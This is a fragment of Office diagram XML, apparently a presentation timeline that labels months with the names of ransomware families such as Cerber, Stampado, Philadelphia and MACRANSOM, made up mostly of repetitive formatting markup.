    <dgm:pt modelId="{A806107D-BCB8-4D66-BA9F-7295D950EDD7}" type="parTrans" cxnId="{3E5AF4A8-11D2-4202-AFFF-5E4DFD931BA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD2B4F52-D4B3-49D3-AF94-E4A9FEB3B4AF}" type="sibTrans" cxnId="{3E5AF4A8-11D2-4202-AFFF-5E4DFD931BA3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{351F5DAD-4E58-4B4D-82D6-607624505416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September</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07DC8EC9-758F-4394-BD33-64BF301F2DDC}" type="parTrans" cxnId="{EE6DB4A6-6553-4D84-84C6-D183069E971B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{074FA898-EEC7-4271-81C7-4BEF743D1622}" type="sibTrans" cxnId="{EE6DB4A6-6553-4D84-84C6-D183069E971B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B5DB19B-D2DA-4C3E-A184-EDE2A07BE2D4}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:xfrm rot="17700000">
          <a:off x="3616014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Chimera</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F43E05E7-B438-4AA2-8CDE-2CE8EF241D20}" type="parTrans" cxnId="{1043B49D-628E-4D43-83F1-ABF66F278E9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F59B7248-0C46-4C9C-A4E0-78A0586E9882}" type="sibTrans" cxnId="{1043B49D-628E-4D43-83F1-ABF66F278E9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32C128A9-016D-42DD-8F84-7DB6002DB64B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Cerber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97F3B9C9-C5AA-43F1-901A-BEB1EF5AD1EA}" type="parTrans" cxnId="{41860949-F25A-4C41-A8C7-0C1A99A7742B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CD4A0DB-6E40-4D61-9E59-4D6306F6B256}" type="sibTrans" cxnId="{41860949-F25A-4C41-A8C7-0C1A99A7742B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2ACB95E-0A48-44E4-8998-4C97E9E3C3AD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Shark</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1879B0F6-81FB-4E2E-939A-8835104B3BD3}" type="parTrans" cxnId="{14D3CF00-D233-4A77-9EDC-0ABEDA988ABB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4385C081-C8D6-41B6-B617-678A89BB614F}" type="sibTrans" cxnId="{14D3CF00-D233-4A77-9EDC-0ABEDA988ABB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96635539-C818-4BB9-A8A1-4502405EDFD6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November</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAFC4A9D-4847-46D6-B481-5861136262C4}" type="parTrans" cxnId="{AC7F4E22-A148-447F-AE3E-1BF82DA32220}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1BA569F-F853-4019-94CD-3A396BDD1764}" type="sibTrans" cxnId="{AC7F4E22-A148-447F-AE3E-1BF82DA32220}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B28BE93-24DF-415C-9636-2929F03789A1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PadCrypt</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> 3.0</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{760342C2-5AE3-48BB-94B6-F8A53FCFFF79}" type="parTrans" cxnId="{1D5F1F25-7204-4FF6-A3CB-3631E3EC25D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{202C3944-F532-4E6B-B3CE-488BAA19470F}" type="sibTrans" cxnId="{1D5F1F25-7204-4FF6-A3CB-3631E3EC25D7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E6BF19D-154D-4DD8-A34E-01B8029CEED7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March</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7440ECDA-9EC3-45C0-9B14-7DE7038B7A29}" type="parTrans" cxnId="{9526B9B8-82EA-482A-9C77-88C64D7D927E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1975BED6-44D9-4AB9-8A7D-5593D29D9141}" type="sibTrans" cxnId="{9526B9B8-82EA-482A-9C77-88C64D7D927E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07CE9918-A0DD-42D0-90DF-7AA2ACA67855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Alpha-locker</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A937AFF-BF79-4B67-82F1-4F9FD8974CAB}" type="parTrans" cxnId="{597AFEFA-8115-40E8-A7B5-E8361E5D1679}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{890D0B5C-6F3A-4153-90DF-1CB69E740C27}" type="sibTrans" cxnId="{597AFEFA-8115-40E8-A7B5-E8361E5D1679}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9C226542-FAFB-463F-82D5-D74FFA814C7D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August</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A834039-0C18-4978-9147-CD1732925F36}" type="parTrans" cxnId="{3D3DB0E8-7518-4B8A-BE58-4EA467551C82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1507B85-549E-4481-B586-C6627634E798}" type="sibTrans" cxnId="{3D3DB0E8-7518-4B8A-BE58-4EA467551C82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F85351C4-AE88-45FB-A3C7-C26844679C8B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EDA2 </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2269FDF0-CF0C-4D54-8BEB-0E25BD179624}" type="parTrans" cxnId="{B8264BBA-2977-4AB1-A33D-E213A35A9E29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24A50486-BA4D-4ECF-AF8C-DDA92D8EFCCC}" type="sibTrans" cxnId="{B8264BBA-2977-4AB1-A33D-E213A35A9E29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{151F3749-5E5E-4037-8A0D-4ECA8B0B3DB8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July </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6707691-7632-4CCE-8B55-C6009746508C}" type="parTrans" cxnId="{990DAEE3-EFD2-4457-8CBF-CE6416191759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4209C33B-949E-4774-988D-8FC100525F9D}" type="sibTrans" cxnId="{990DAEE3-EFD2-4457-8CBF-CE6416191759}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F174FEBA-606B-4758-B93F-F2CE28432A04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Stampado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3F2CBC27-B31C-43BE-9905-5E53C4C2C18F}" type="parTrans" cxnId="{4A089AA1-69A6-4213-A99C-FA57141EDE2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BA6908C-292D-4F6F-9E6F-94B1F1E8F88C}" type="sibTrans" cxnId="{4A089AA1-69A6-4213-A99C-FA57141EDE2B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8970DD42-16BF-473B-B9EA-D23F839FB14B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Philadelphia</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC518083-7448-46A4-BA39-0C65D56F2454}" type="parTrans" cxnId="{B4FEBE7A-2BF7-40FE-B3B9-848E87BAF87B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAE5CB11-5EF7-41A6-8F0F-95FF005EAD41}" type="sibTrans" cxnId="{B4FEBE7A-2BF7-40FE-B3B9-848E87BAF87B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C104186-A88F-4F95-8FE2-4190E4FC7719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Ranion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6085A540-300A-4A10-BE6E-55FAEB54CBAC}" type="parTrans" cxnId="{CEBC12DF-B1B9-4AFA-9406-F53DF9C9C3C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2397C22-272F-467A-B891-2329DD34EF38}" type="sibTrans" cxnId="{CEBC12DF-B1B9-4AFA-9406-F53DF9C9C3C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F315352A-4426-408A-A8A3-1D9FA9B4CCF4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Unlock26 Trojan</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB99DF15-788E-434E-9920-09D3DCDB4277}" type="parTrans" cxnId="{6F2E0BDE-78CC-4F4F-AE2F-BE55B927B895}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5AF97DB-E06E-4886-A24C-62CF29B01A95}" type="sibTrans" cxnId="{6F2E0BDE-78CC-4F4F-AE2F-BE55B927B895}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAA4F1AA-E193-46B3-8154-1991C7309162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DOT ransomware portal</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9AD26F2A-0CC0-401D-9899-CC0E839BF62F}" type="parTrans" cxnId="{7156956E-EF65-42FA-B127-129B3879EBD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1F651F7-E7F3-428B-A356-32FC9CEA2B0B}" type="sibTrans" cxnId="{7156956E-EF65-42FA-B127-129B3879EBD5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02B00232-2226-4448-BF10-84E4A49BF328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March</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F9F9533-044A-42FE-A2E4-909F708DF18A}" type="parTrans" cxnId="{B110A75C-9AE0-4A0D-9547-DABCEB8EFFCC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DEF9B6FD-9160-4551-A9A3-5E1AF0FD844C}" type="sibTrans" cxnId="{B110A75C-9AE0-4A0D-9547-DABCEB8EFFCC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{814661F2-E1CA-430D-B94B-F71BBCE1FB5F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Karmen</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD374E34-7751-46ED-8FC7-EC20DB63A5EC}" type="parTrans" cxnId="{5ED500CD-F5F4-4ACE-B3D0-4527286FB010}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C0FA306-A1F6-42B6-A2E0-35EEF336C7C1}" type="sibTrans" cxnId="{5ED500CD-F5F4-4ACE-B3D0-4527286FB010}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F0207D8-7CAB-4892-B356-7C2A8A213A1D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b="0" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Saturn</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D1B7794-EE81-48B4-9322-7B559F68A8E0}" type="parTrans" cxnId="{515B7C57-0153-4B58-9D82-8C7BF3356598}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED7A0999-4F27-41A5-B228-1D2EC1D78CAA}" type="sibTrans" cxnId="{515B7C57-0153-4B58-9D82-8C7BF3356598}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5316300B-1479-4BE2-B4CA-7AFFB3E4A5B5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February</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6BB94DCE-8A0F-4BD9-926C-B5292145B277}" type="parTrans" cxnId="{C667D2B1-FA13-4F8F-8E53-91653C26C969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D949C87-CDEB-4FF7-BC8C-11E55F296888}" type="sibTrans" cxnId="{C667D2B1-FA13-4F8F-8E53-91653C26C969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABBB877F-D9D2-4849-AAF0-B10552247CE2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s-CR" sz="500" b="0" i="0" dirty="0"/>
            <a:t>ShurL0ckr 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E847AAD9-00C8-4E2C-B3DA-6F09D59422BB}" type="parTrans" cxnId="{6D2F4227-BE2B-483D-A01D-E15B5C1E4A19}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C97C810-C309-450C-87CF-775D100CA8E8}" type="sibTrans" cxnId="{6D2F4227-BE2B-483D-A01D-E15B5C1E4A19}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{661D95B6-989D-40EA-9130-B0315DCE0E4C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June</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{438C6C88-9A34-4E84-9D45-0066112EA36A}" type="parTrans" cxnId="{38829090-CA4A-47CB-85E4-A245C90D78B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64BE5D0C-20AB-49C3-85E5-888D474CD153}" type="sibTrans" cxnId="{38829090-CA4A-47CB-85E4-A245C90D78B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A62465E9-5A7D-4CA1-B400-900026385414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s-CR" sz="500" b="0" i="0" dirty="0"/>
            <a:t>MACRANSOM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C5775951-8C43-4F2A-B139-47F5CA1D774F}" type="parTrans" cxnId="{5DBD96EE-CFF9-4819-A2B3-DA693DD2491B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A881C11B-121B-46B4-A2B3-DF67A4524845}" type="sibTrans" cxnId="{5DBD96EE-CFF9-4819-A2B3-DA693DD2491B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4167FE8E-DA4D-4C42-8413-54F9484E73B0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May</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F2FB77C-3145-4835-BBBA-2FF78280D34A}" type="parTrans" cxnId="{9800F993-E79D-4E84-9E4D-6B440DCE6DD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{803EC87C-477D-4009-8FF0-26D2C4E408B5}" type="sibTrans" cxnId="{9800F993-E79D-4E84-9E4D-6B440DCE6DD8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02E7F1E2-A3DD-4DB4-8A92-34A5730BCE7F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FatBoy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> RaaS</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5614882-DD5B-45A4-AEE9-2275F2991C6C}" type="parTrans" cxnId="{FBE7C945-5BC0-40CA-BCCD-C944EC67D138}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B2B2520-3C08-429A-B582-9243EB3574A7}" type="sibTrans" cxnId="{FBE7C945-5BC0-40CA-BCCD-C944EC67D138}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52D8B2F3-3865-4204-838E-5B8723AD5B1D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Zelta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F66BB769-5EA5-4050-8424-85221DFB27C6}" type="parTrans" cxnId="{F2EC819B-3F97-4BED-9874-0743B408A9B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0EB1011-8A11-4A4E-93CF-8077611D9BAD}" type="sibTrans" cxnId="{F2EC819B-3F97-4BED-9874-0743B408A9B1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0C89D72-E6BE-4F70-BD4A-82213CA00498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Stampado</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="500" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t> variant</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B10E7D77-3154-4E3A-9E2A-FA4D01DBB262}" type="parTrans" cxnId="{7AFFAF5B-FDFD-4AAF-B203-6F89BF0C2076}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C4CAA0F-01C5-49D3-B917-32635A2DA0D2}" type="sibTrans" cxnId="{7AFFAF5B-FDFD-4AAF-B203-6F89BF0C2076}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7346A249-A50F-4B62-AB13-720077135F05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s-CR" sz="500" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>SHIFR 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F115A92E-0EA8-42A7-B125-E94991D4260E}" type="parTrans" cxnId="{34389751-B0DB-4A31-9646-0B1D2E9BCF2C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF09701B-61EC-463D-A7B7-4AD4CF854A41}" type="sibTrans" cxnId="{34389751-B0DB-4A31-9646-0B1D2E9BCF2C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90F76059-07E6-4D9F-8141-7D663DC55998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August</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23188E29-368D-4436-B7FD-8B2BBAE31EF0}" type="parTrans" cxnId="{4A4DD715-56B7-413F-8E7E-64B887958042}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1931A6E9-4A15-4FA7-AB77-E336F0DDA60F}" type="sibTrans" cxnId="{4A4DD715-56B7-413F-8E7E-64B887958042}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="es-CR" sz="1800"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDA3CCE3-2FF6-42AF-8CA5-F0251304ABFB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3301</a:t>
          </a:r>
        </a:p>
